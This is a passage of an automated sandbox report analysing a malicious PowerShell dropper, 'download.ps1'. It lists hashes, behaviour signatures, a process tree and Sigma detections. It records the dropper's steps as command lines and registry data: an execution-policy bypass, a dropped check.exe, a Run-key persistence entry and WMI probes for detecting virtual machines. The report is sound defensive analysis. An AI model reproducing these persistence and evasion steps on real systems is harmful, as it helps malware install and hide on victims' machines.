Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:	download.ps1
Analysis ID:	1571746
MD5:	828e0cc3c14385d28606aca4c5edf657
SHA1:	bc962c5c0d31e0e0c13c0c3505a53ec3d3251a25
SHA256:	aef32c3cd1cd6bd44239ca9a75064cfa31fc0d582e33683c1c602559b7e107f8
Tags:	KongTukeps1user-monitorsg
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected suspicious sample

Contains functionality to infect the boot sector

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Opens network shares

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to enumerate running services

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Classification

Process Tree

System is w10x64

powershell.exe (PID: 1872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

check.exe (PID: 3276 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

check.exe (PID: 3120 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

systeminfo.exe (PID: 3976 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6712 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3020 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WerFault.exe (PID: 4100 cmdline: C:\Windows\system32\WerFault.exe -u -p 3120 -s 968 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

check.exe (PID: 5596 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

check.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

systeminfo.exe (PID: 3724 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6636 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5672 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WerFault.exe (PID: 2952 cmdline: C:\Windows\system32\WerFault.exe -u -p 7100 -s 968 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

check.exe (PID: 4128 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

check.exe (PID: 5536 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

systeminfo.exe (PID: 6016 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

conhost.exe (PID: 4360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2856 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 6764 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WerFault.exe (PID: 7024 cmdline: C:\Windows\system32\WerFault.exe -u -p 5536 -s 1012 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 1872, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1872, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1872, TargetFilename: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 1872, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.0% probability

Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.1791390585.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.1792660148.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000005.00000002.2170173659.00007FFBA0E47000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.1764181541.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2202836446.00007FFBBC703000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: check.exe, 00000005.00000002.2172607096.00007FFBA129A000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2183774332.00007FFBA9895000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2184592817.00007FFBA9935000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2175053692.00007FFBA17D6000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1792161641.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2172607096.00007FFBA1202000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000005.00000002.2194580325.00007FFBB5CD4000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000005.00000002.2194580325.00007FFBB5CD4000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2172607096.00007FFBA129A000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.1779981685.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2201831662.00007FFBBC155000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000005.00000002.2200750849.00007FFBBBE93000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2203368658.00007FFBC1A27000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2203368658.00007FFBC1A27000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2188337968.00007FFBB1893000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000005.00000002.2200254820.00007FFBBB746000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1792161641.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2175053692.00007FFBA17D6000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000005.00000002.2191613703.00007FFBB5C1D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2163791427.00007FFBA069A000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2203785112.00007FFBC1B34000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000005.00000002.2189414783.00007FFBB4C49000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2183774332.00007FFBA9895000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.1779557070.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2185925889.00007FFBAB9BE000.00000002.00000001.01000000.00000019.sdmp

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8E83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00007FF61E8E83C0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8E9280 FindFirstFileExW,FindClose,	4_2_00007FF61E8E9280
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E901874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00007FF61E901874

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 16_2_00007FFB9DD62E70 memset,PyList_New,SetErrorMode,PyArg_ParseTuple,PyObject_IsTrue,PyEval_SaveThread,GetLogicalDriveStringsA,PyEval_RestoreThread,PyErr_SetFromWindowsErr,SetErrorMode,PyEval_SaveThread,GetDriveTypeA,PyEval_RestoreThread,GetVolumeInformationA,strcat_s,SetLastError,strcat_s,strcat_s,strcat_s,FindFirstVolumeMountPointA,strcpy_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,FindNextVolumeMountPointA,FindVolumeMountPointClose,strcat_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,strchr,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,_Py_Dealloc,_Py_Dealloc,

16_2_00007FFB9DD62E70

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: nodejs.org

Source: check.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
Source: check.exe, 00000004.00000003.2208485892.0000028311F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredID
Source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1782384154.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1775657860.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773967823.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1769611350.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1795572179.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1771878614.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793731600.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311F00000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773756678.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1794748635.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792394071.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1772457006.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1764868786.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1782384154.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1775657860.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773967823.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1769611350.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1795572179.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1771878614.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793731600.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311F00000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773756678.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1794748635.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792394071.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1772457006.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1764868786.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1782384154.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1775657860.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773967823.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1769611350.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1795572179.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1771878614.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793731600.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773756678.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1794748635.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792394071.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1772457006.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1764868786.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 